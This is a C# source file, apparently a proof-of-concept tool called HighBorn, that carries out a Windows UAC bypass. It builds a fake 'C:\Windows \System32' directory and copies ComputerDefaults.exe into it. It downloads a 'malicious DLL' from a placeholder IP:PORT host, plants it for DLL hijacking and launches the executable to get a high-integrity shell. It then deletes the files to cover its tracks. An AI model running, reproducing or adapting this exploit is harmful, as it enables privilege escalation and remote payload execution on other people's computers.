| 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126 |
- using System;
- using System.IO;
- using System.Runtime.InteropServices;
- using System.Diagnostics;
- using System.Net;
- namespace HighBorn
- {
- class HighBorn
- {
- [DllImport("kernel32.dll", SetLastError = true)]
- static extern bool Wow64DisableWow64FsRedirection(ref IntPtr ptr);
- [DllImport("kernel32.dll", SetLastError = true)]
- static extern bool Wow64RevertWow64FsRedirection(IntPtr ptr);
- [DllImport("kernel32.dll", SetLastError = true)]
- static extern bool CreateDirectory(string lpPathName, IntPtr lpSecurityAttributes);
- [DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
- static extern bool CopyFile(string lpExistingFileName, string lpNewFileName, bool bFailIfExists);
- [DllImport("kernel32.dll", SetLastError = true)]
- [return: MarshalAs(UnmanagedType.Bool)]
- static extern bool DeleteFileW([MarshalAs(UnmanagedType.LPWStr)]string lpFileName);
- [DllImport("kernel32.dll", SetLastError = true)]
- static extern bool RemoveDirectory(string lpPathName);
- [DllImport("ntdll.dll")]
- public static extern int NtDelayExecution(bool Alertable, ref long DelayInterval);
- [DllImport("ntdll.dll")]
- public static extern int ZwSetTimerResolution(uint RequestedResolution, bool Set, out uint ActualResolution);
- private static bool isResolutionSet = false;
- static void SleepShort(float milliseconds)
- {
- if (!isResolutionSet)
- {
- uint actualResolution;
- ZwSetTimerResolution(1, true, out actualResolution);
- isResolutionSet = true;
- }
- long interval = (long)(-1 * milliseconds * 10000.0f); // Convert to 100-nanosecond intervals
- NtDelayExecution(false, ref interval);
- }
- public static void Main(string[] args)
- {
- IntPtr wow64Value = IntPtr.Zero;
- Wow64DisableWow64FsRedirection(ref wow64Value);
- Console.WriteLine("[^] Directories Created");
- try
- {
- CreateDirectory(@"\\?\C:\Windows \", IntPtr.Zero);
- CreateDirectory(@"\\?\C:\Windows \System32\", IntPtr.Zero);
- }
- catch
- {
- Console.WriteLine("[-] Unable to create directories");
- }
- SleepShort(2000); // Sleep for 2 seconds
- Console.WriteLine("[^] Copying Executable Into Mock Directory");
- try
- {
- CopyFile(@"C:\Windows\System32\ComputerDefaults.exe", @"C:\Windows \System32\ComputerDefaults.exe", true);
- }
- catch
- {
- Console.WriteLine("[-] Unable to create the mock directories");
- }
- SleepShort(2000); // Sleep for 2 seconds
- Console.WriteLine("[^] Downloading Malicious DLL");
- try
- {
- using (WebClient webClient = new WebClient())
- {
- webClient.DownloadFile("http://IP:PORT/secur32.dll", @"C:\Windows\temp\secur32.dll");
- }
- }
- catch
- {
- Console.WriteLine("[^] DLL Downloaded");
- }
- CopyFile(@"C:\Windows\temp\secur32.dll", @"C:\Windows \System32\secur32.dll", true);
- SleepShort(2000); // Sleep for 2 seconds
- Console.WriteLine("[^] Spawning High Integrity Shell");
- try
- {
- Process.Start(@"C:\Windows \System32\ComputerDefaults.exe").WaitForExit();
- }
- catch
- {
- Console.WriteLine("[-] Shell messed up");
- }
- SleepShort(2000); // Sleep for 2 seconds
- Console.WriteLine("[^] Cleaning Up");
- DeleteFileW(@"C:\Windows\temp\secur32.dll");
- SleepShort(2000);
- DeleteFileW(@"C:\Windows \System32\ComputerDefaults.exe");
- SleepShort(2000);
- DeleteFileW(@"C:\Windows \System32\secur32.dll");
- RemoveDirectory(@"C:\Windows \System32\");
- RemoveDirectory(@"C:\Windows \");
- Wow64RevertWow64FsRedirection(wow64Value);
- }
- }
- }
|
